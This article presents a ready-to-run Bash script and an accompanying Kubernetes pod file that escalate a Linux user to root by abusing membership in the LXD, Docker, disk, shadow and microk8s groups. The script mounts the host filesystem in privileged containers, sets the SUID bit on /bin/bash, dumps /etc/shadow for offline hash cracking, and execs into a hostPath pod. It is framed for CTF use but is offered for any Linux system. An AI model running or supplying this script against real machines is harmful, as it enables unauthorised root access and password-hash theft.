Linux Privilege Escalation through Group Exploitation

Privilege escalation is a critical concern in the realm of cyber security, and Linux systems are no exception.

This article delves into a Bash script that automates privilege escalation based on user group membership. While primarily developed for Capture The Flag (CTF) challenges, the following script can be employed in various Linux environments and it will probably work. We will explore how this method works, focusing on the exploitation of specific groups, including LXD, Docker, Disk, Shadow, and microk8s.

The script:

#!/bin/bash

## Linux Groups Privilege Escalation II
#######################################

RE="\e[31m"; GR="\e[32m"; YE="\e[33m"; BL="\e[34m"; NC="\e[0m"

echo ">> Checking system,....."
groups | grep lxd  &> /dev/null

out=$(echo $?)

if [[ $out =~ 0 ]]
then
   echo -e "${YE}\n[+] Vulnerable to LXD${NC}"
   echo -e "${RE}\nUpload alpine-v3.13-x86_64-20210218_0139.tar.gz. Download it from: ${NC}\nhttps://XX_IP/alpine-v3.13-x86_64-20210218_0139.tar.gz"
   ls alpine-v3.13-x86_64-20210218_0139.tar.gz  &> /dev/null
   out2=$(echo $?)
   if [[ $out2 =~ 0 ]]
   then
      echo -e "\n${GR}Image File Found${NC}\n"
      lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage &> /dev/null
      lxc init myimage mycontainer -c security.privileged=true &> /dev/null
      lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true &> /dev/null
      lxc start mycontainer &> /dev/null
      echo -e "You have host FileSystem in /mnt/root path"
      lxc exec mycontainer /bin/sh 
   else
      echo -e "\n${RE}File NOT Found!!${NC}"
      exit
   fi
else
   echo -e "\n${RE}[+] LXD NOT VULNERABLE${NC}"

fi

groups | grep docker  &> /dev/null

out3=$(echo $?)

if [[ $out3 =~ 0 ]]
then
   echo -e "${YE}\n[+] Vulnerable to DOCKER PRIVESC${NC}\n"
   #d_i=$(docker images --format "{{.ImagesRepository}}" | head -n 1)
   docker run -v /:/mnt --rm -it ubuntu chmod u+s /mnt/bin/bash
   bash -p
   echo -e "\n${RE}Entering the docker container in case you couldn't pwn with the previous shell${NC}"
   echo -e "\nYou have the host FileSystem in /mnt path\n"
   docker run -v /:/mnt --rm -it ubuntu bash
else
   echo -e "\n${RE}[+] DOCKER NOT VULNERABLE${NC}"

fi

groups | grep disk  &> /dev/null

out4=$(echo $?)

if [[ $out4 =~ 0 ]]
then
   echo -e "${YE}\n[+] Vulnerable to DISK PRIVESC${NC}\n"
   echo -e "${YE}Files You Can List${NC}\n"
   find / -group disk 2>/dev/null
else
   echo -e "\n${RE}[+] DISK GROUP NOT VULNERABLE${NC}"
fi

groups | grep shadow  &> /dev/null

out6=$(echo $?)

if [[ $out6 =~ 0 ]]
then
   echo -e "${YE}\n[+] Vulnerable to SHADOW Privilege Escalation!${NC}\n"
   echo -e "${YE}/etc/shadow File to try to decrypt hashes${NC}\n"
   cat /etc/shadow
else
   echo -e "\n${RE}[+] SHADOW GROUP NOT VULNERABLE${NC}"
fi

groups | grep microk8s  &> /dev/null

out7=$(echo $?)

if [[ $out7 =~ 0 ]]
then
   echo -e "${YE}\n[+] Vulnerable to MICROK8S Privilege Escalation!${NC}\n"
   echo -e "${RE}Upload this file to this folder:${NC}\nhttps://XX_IP/toolz/pod.yaml"
   ls pod.yaml  &> /dev/null
   out10=$(echo $?)
   if [[ $out10 =~ 0 ]]
   then
      echo -e "\n${GR}File Founded!!${NC}\n"
      image=$(microk8s.kubectl get deployment -o yaml | grep "image" -m 1 |  sed 's/ //g' | cut -c 8-)
      sed -i "s/XX_PD/$image/" pod.yaml
      microk8s.kubectl apply -f pod.yaml
      microk8s.kubectl exec -it priv-esc -- /bin/bash
      echo -e "\nIf you haven't received a shell, add this value, $image , to the image field of the pod.yaml file.Then run the following command: \n- microk8s.kubectl apply -f pod.yaml\n- microk8s.kubectl exec -it priv-esc -- /bin/bash"
   else
      echo -e "\n${RE}File NOT Found!!${NC}"
   fi
else
   echo -e "\n${RE}[+] MICROK8S GROUP NOT VULNERABLE${NC}"
fi

The following file is a sample pod that can easily do the trick. In this file the script just replaces the XX_PD string for the right image name.

apiVersion: v1
kind: Pod
metadata:
  name: priv-esc
spec:
  containers:
  - name: shell
    image: XX_PD
    command:
      - "/bin/bash"
      - "-c"
      - "sleep 10000"
    volumeMounts:
      - name: root
        mountPath: /mnt/root
  volumes:
  - name: root
    hostPath:
      path: /
      type: Directory

Understanding the Process:

1. LXD Group: The script initiates the privilege escalation process by targeting the LXD group. If the user is part of this group, the script creates a container where the entire HOST filesystem is mounted within the /mnt/root directory. To facilitate this, a file named alpine-v3.13-x86_64-20210218_0139.tar.gz must be uploaded, which will make the trick. This group's exploitation allows the user to access the host system's files securely encapsulated within the container.
2. Docker Group: The script then proceeds to exploit the Docker group, which offers a relatively straightforward privilege escalation. No file uploads are necessary for this group. Instead, the script creates a Docker container that grants a reverse shell with root permissions by acquiring SUID permissions on the /bin/bash file. In the event this approach fails, the script provides a shell within the created container. Navigating to the /mnt path within this container enables the user to access, read, and write files on the host machine.
3. Disk Group: The Disk group introduces a slightly different challenge compared to the previous two. Exploitation of this group depends on the server’s configuration, enabling users to access files and partitions typically restricted to regular users. In response, the script lists the files with which the Disk group can interact, extending user privileges in a controlled manner.
4. Shadow Group: As the name suggests, the Shadow group grants access to the /etc/shadow file, which contains sensitive password hash information. The script leverages this group to read the /etc/shadow file, allowing users to attempt offline cracking of the stored hashes.
5. microk8s Group: The script concludes by exploiting the microk8s group, which closely resembles the LXD and Docker groups but with a focus on Kubernetes(k8s). While this script is generally effective, it may encounter issues on some systems. Remember that you will need the file named pod.yaml or something similar.

Conclusion: Privilege escalation remains a pertinent concern in Linux systems, and understanding how it can be exploited is crucial for both defensive and offensive security efforts.

This Bash script provides an insightful example of how user group memberships can be leveraged for privilege escalation, ultimately highlighting the importance of secure group management and system configuration. As cyber-security continues to evolve, it presents an ever-changing landscape of challenges and opportunities.

Organizations and individuals alike must adapt to the latest threats and security measures to safeguard ALL their digital assets. Staying informed about emerging technologies, threat vectors, and best practices is essential in the ongoing battle to protect sensitive data and infrastructure.

Furthermore, the collaborative efforts of the global cybersecurity community play a vital role in strengthening our collective defenses and promoting a safer digital environment for all.

Remember no system is secure even if it’s isolated from the Internet. ;)